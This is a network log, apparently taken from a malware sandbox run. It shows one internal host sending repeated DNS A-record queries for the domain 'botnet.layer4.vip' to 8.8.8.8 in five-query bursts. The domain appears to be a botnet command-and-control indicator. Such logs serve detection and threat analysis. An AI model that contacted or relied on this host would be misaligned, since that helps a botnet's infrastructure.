                                  Apr 9, 2023 03:31:23.103312016 CEST192.168.2.238.8.8.80xd3ddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.129884005 CEST192.168.2.238.8.8.80xd3ddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.154494047 CEST192.168.2.238.8.8.80x84a5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.170515060 CEST192.168.2.238.8.8.80x84a5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.186470985 CEST192.168.2.238.8.8.80x84a5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.202343941 CEST192.168.2.238.8.8.80x84a5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.226922989 CEST192.168.2.238.8.8.80x84a5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.251696110 CEST192.168.2.238.8.8.80x5090Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.275906086 CEST192.168.2.238.8.8.80x5090Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.291954994 CEST192.168.2.238.8.8.80x5090Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.307872057 CEST192.168.2.238.8.8.80x5090Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.332499981 CEST192.168.2.238.8.8.80x5090Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.357266903 CEST192.168.2.238.8.8.80xf6c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.373208046 CEST192.168.2.238.8.8.80xf6c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.397263050 CEST192.168.2.238.8.8.80xf6c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.412843943 CEST192.168.2.238.8.8.80xf6c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.428395033 CEST192.168.2.238.8.8.80xf6c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.444489002 CEST192.168.2.238.8.8.80xa0ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.460447073 CEST192.168.2.238.8.8.80xa0ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.475996971 CEST192.168.2.238.8.8.80xa0ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.491632938 CEST192.168.2.238.8.8.80xa0ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.516215086 CEST192.168.2.238.8.8.80xa0ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.540569067 CEST192.168.2.238.8.8.80x2aa6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.556253910 CEST192.168.2.238.8.8.80x2aa6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.580565929 CEST192.168.2.238.8.8.80x2aa6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.596688986 CEST192.168.2.238.8.8.80x2aa6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.612466097 CEST192.168.2.238.8.8.80x2aa6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.628386021 CEST192.168.2.238.8.8.80x7994Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.652617931 CEST192.168.2.238.8.8.80x7994Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.668267965 CEST192.168.2.238.8.8.80x7994Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.692857027 CEST192.168.2.238.8.8.80x7994Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.717552900 CEST192.168.2.238.8.8.80x7994Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.733634949 CEST192.168.2.238.8.8.80x3664Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.749279022 CEST192.168.2.238.8.8.80x3664Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.773490906 CEST192.168.2.238.8.8.80x3664Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.789403915 CEST192.168.2.238.8.8.80x3664Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.804974079 CEST192.168.2.238.8.8.80x3664Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.820780039 CEST192.168.2.238.8.8.80xbcabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.845102072 CEST192.168.2.238.8.8.80xbcabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.860683918 CEST192.168.2.238.8.8.80xbcabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.884824038 CEST192.168.2.238.8.8.80xbcabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.908989906 CEST192.168.2.238.8.8.80xbcabStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.924685001 CEST192.168.2.238.8.8.80x3b43Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.949155092 CEST192.168.2.238.8.8.80x3b43Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.965128899 CEST192.168.2.238.8.8.80x3b43Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.989537954 CEST192.168.2.238.8.8.80x3b43Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.013798952 CEST192.168.2.238.8.8.80x3b43Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.038316011 CEST192.168.2.238.8.8.80xa108Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.062705040 CEST192.168.2.238.8.8.80xa108Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.086812973 CEST192.168.2.238.8.8.80xa108Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.111140013 CEST192.168.2.238.8.8.80xa108Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.129007101 CEST192.168.2.238.8.8.80xa108Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.153515100 CEST192.168.2.238.8.8.80x81cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.169068098 CEST192.168.2.238.8.8.80x81cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.193085909 CEST192.168.2.238.8.8.80x81cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.217502117 CEST192.168.2.238.8.8.80x81cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.233066082 CEST192.168.2.238.8.8.80x81cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.257244110 CEST192.168.2.238.8.8.80xd098Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.273222923 CEST192.168.2.238.8.8.80xd098Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.289006948 CEST192.168.2.238.8.8.80xd098Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.313426018 CEST192.168.2.238.8.8.80xd098Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.337908983 CEST192.168.2.238.8.8.80xd098Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.353768110 CEST192.168.2.238.8.8.80xe1caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.378154039 CEST192.168.2.238.8.8.80xe1caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.402399063 CEST192.168.2.238.8.8.80xe1caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.426611900 CEST192.168.2.238.8.8.80xe1caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.442507982 CEST192.168.2.238.8.8.80xe1caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.458350897 CEST192.168.2.238.8.8.80x882dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.483055115 CEST192.168.2.238.8.8.80x882dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.507285118 CEST192.168.2.238.8.8.80x882dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.522872925 CEST192.168.2.238.8.8.80x882dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.538680077 CEST192.168.2.238.8.8.80x882dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.554354906 CEST192.168.2.238.8.8.80x6742Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.569868088 CEST192.168.2.238.8.8.80x6742Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.585359097 CEST192.168.2.238.8.8.80x6742Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.600995064 CEST192.168.2.238.8.8.80x6742Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.616487026 CEST192.168.2.238.8.8.80x6742Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.640651941 CEST192.168.2.238.8.8.80x7038Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.665087938 CEST192.168.2.238.8.8.80x7038Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.689570904 CEST192.168.2.238.8.8.80x7038Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.705491066 CEST192.168.2.238.8.8.80x7038Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.721297026 CEST192.168.2.238.8.8.80x7038Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.736910105 CEST192.168.2.238.8.8.80x70c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.761090994 CEST192.168.2.238.8.8.80x70c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.785279989 CEST192.168.2.238.8.8.80x70c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.800714970 CEST192.168.2.238.8.8.80x70c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.824743032 CEST192.168.2.238.8.8.80x70c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.840595961 CEST192.168.2.238.8.8.80x9289Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.856165886 CEST192.168.2.238.8.8.80x9289Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.880274057 CEST192.168.2.238.8.8.80x9289Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.904481888 CEST192.168.2.238.8.8.80x9289Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.920021057 CEST192.168.2.238.8.8.80x9289Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.936469078 CEST192.168.2.238.8.8.80x739eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.953325033 CEST192.168.2.238.8.8.80x739eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.969834089 CEST192.168.2.238.8.8.80x739eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.994010925 CEST192.168.2.238.8.8.80x739eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.018631935 CEST192.168.2.238.8.8.80x739eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.043293953 CEST192.168.2.238.8.8.80xabbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.067815065 CEST192.168.2.238.8.8.80xabbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.083596945 CEST192.168.2.238.8.8.80xabbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.108028889 CEST192.168.2.238.8.8.80xabbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.124006987 CEST192.168.2.238.8.8.80xabbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.148626089 CEST192.168.2.238.8.8.80xfb23Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.164187908 CEST192.168.2.238.8.8.80xfb23Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.179795980 CEST192.168.2.238.8.8.80xfb23Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.195388079 CEST192.168.2.238.8.8.80xfb23Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.219955921 CEST192.168.2.238.8.8.80xfb23Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.244926929 CEST192.168.2.238.8.8.80xe123Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.269632101 CEST192.168.2.238.8.8.80xe123Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.285505056 CEST192.168.2.238.8.8.80xe123Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.301498890 CEST192.168.2.238.8.8.80xe123Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.325989008 CEST192.168.2.238.8.8.80xe123Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.342150927 CEST192.168.2.238.8.8.80xe9a1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.366667032 CEST192.168.2.238.8.8.80xe9a1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.390940905 CEST192.168.2.238.8.8.80xe9a1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.415097952 CEST192.168.2.238.8.8.80xe9a1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.431047916 CEST192.168.2.238.8.8.80xe9a1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.447119951 CEST192.168.2.238.8.8.80x820cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.463197947 CEST192.168.2.238.8.8.80x820cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.487763882 CEST192.168.2.238.8.8.80x820cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.511912107 CEST192.168.2.238.8.8.80x820cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.528037071 CEST192.168.2.238.8.8.80x820cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.544017076 CEST192.168.2.238.8.8.80xdc8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.568300962 CEST192.168.2.238.8.8.80xdc8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.592425108 CEST192.168.2.238.8.8.80xdc8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.608189106 CEST192.168.2.238.8.8.80xdc8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.632613897 CEST192.168.2.238.8.8.80xdc8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.648783922 CEST192.168.2.238.8.8.80xaf61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.673464060 CEST192.168.2.238.8.8.80xaf61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.698184013 CEST192.168.2.238.8.8.80xaf61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.713995934 CEST192.168.2.238.8.8.80xaf61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.738703966 CEST192.168.2.238.8.8.80xaf61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.754899979 CEST192.168.2.238.8.8.80x4be7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.779222965 CEST192.168.2.238.8.8.80x4be7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.803937912 CEST192.168.2.238.8.8.80x4be7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.819837093 CEST192.168.2.238.8.8.80x4be7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.844006062 CEST192.168.2.238.8.8.80x4be7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.859749079 CEST192.168.2.238.8.8.80xf509Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.883930922 CEST192.168.2.238.8.8.80xf509Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.899568081 CEST192.168.2.238.8.8.80xf509Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.923629999 CEST192.168.2.238.8.8.80xf509Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.947745085 CEST192.168.2.238.8.8.80xf509Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.972028971 CEST192.168.2.238.8.8.80x68dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.990128040 CEST192.168.2.238.8.8.80x68dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.014363050 CEST192.168.2.238.8.8.80x68dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.030148029 CEST192.168.2.238.8.8.80x68dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.054512024 CEST192.168.2.238.8.8.80x68dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.070389032 CEST192.168.2.238.8.8.80x79b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.094497919 CEST192.168.2.238.8.8.80x79b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.110058069 CEST192.168.2.238.8.8.80x79b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.134423018 CEST192.168.2.238.8.8.80x79b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.158950090 CEST192.168.2.238.8.8.80x79b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.174839973 CEST192.168.2.238.8.8.80xc2f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.190812111 CEST192.168.2.238.8.8.80xc2f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.215059042 CEST192.168.2.238.8.8.80xc2f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.239350080 CEST192.168.2.238.8.8.80xc2f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.263634920 CEST192.168.2.238.8.8.80xc2f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.289922953 CEST192.168.2.238.8.8.80x25a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.305561066 CEST192.168.2.238.8.8.80x25a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.329770088 CEST192.168.2.238.8.8.80x25a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.345695972 CEST192.168.2.238.8.8.80x25a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.361473083 CEST192.168.2.238.8.8.80x25a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.385905981 CEST192.168.2.238.8.8.80x42f2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.410492897 CEST192.168.2.238.8.8.80x42f2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.434972048 CEST192.168.2.238.8.8.80x42f2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.450589895 CEST192.168.2.238.8.8.80x42f2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.475388050 CEST192.168.2.238.8.8.80x42f2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.491333961 CEST192.168.2.238.8.8.80xa67eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.515476942 CEST192.168.2.238.8.8.80xa67eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.539946079 CEST192.168.2.238.8.8.80xa67eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.555923939 CEST192.168.2.238.8.8.80xa67eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.580492973 CEST192.168.2.238.8.8.80xa67eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.605114937 CEST192.168.2.238.8.8.80x7d3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.629729986 CEST192.168.2.238.8.8.80x7d3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.645700932 CEST192.168.2.238.8.8.80x7d3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.670222044 CEST192.168.2.238.8.8.80x7d3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.694834948 CEST192.168.2.238.8.8.80x7d3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.710871935 CEST192.168.2.238.8.8.80xc4b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.735443115 CEST192.168.2.238.8.8.80xc4b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.751393080 CEST192.168.2.238.8.8.80xc4b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.775705099 CEST192.168.2.238.8.8.80xc4b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.799877882 CEST192.168.2.238.8.8.80xc4b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.824281931 CEST192.168.2.238.8.8.80xc558Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.849056005 CEST192.168.2.238.8.8.80xc558Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.864774942 CEST192.168.2.238.8.8.80xc558Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.889394999 CEST192.168.2.238.8.8.80xc558Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.913590908 CEST192.168.2.238.8.8.80xc558Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.929395914 CEST192.168.2.238.8.8.80xc482Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.954052925 CEST192.168.2.238.8.8.80xc482Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.969779015 CEST192.168.2.238.8.8.80xc482Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.985744953 CEST192.168.2.238.8.8.80xc482Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.001713037 CEST192.168.2.238.8.8.80xc482Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.017489910 CEST192.168.2.238.8.8.80x5973Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.041685104 CEST192.168.2.238.8.8.80x5973Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.057838917 CEST192.168.2.238.8.8.80x5973Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.073515892 CEST192.168.2.238.8.8.80x5973Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.098007917 CEST192.168.2.238.8.8.80x5973Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
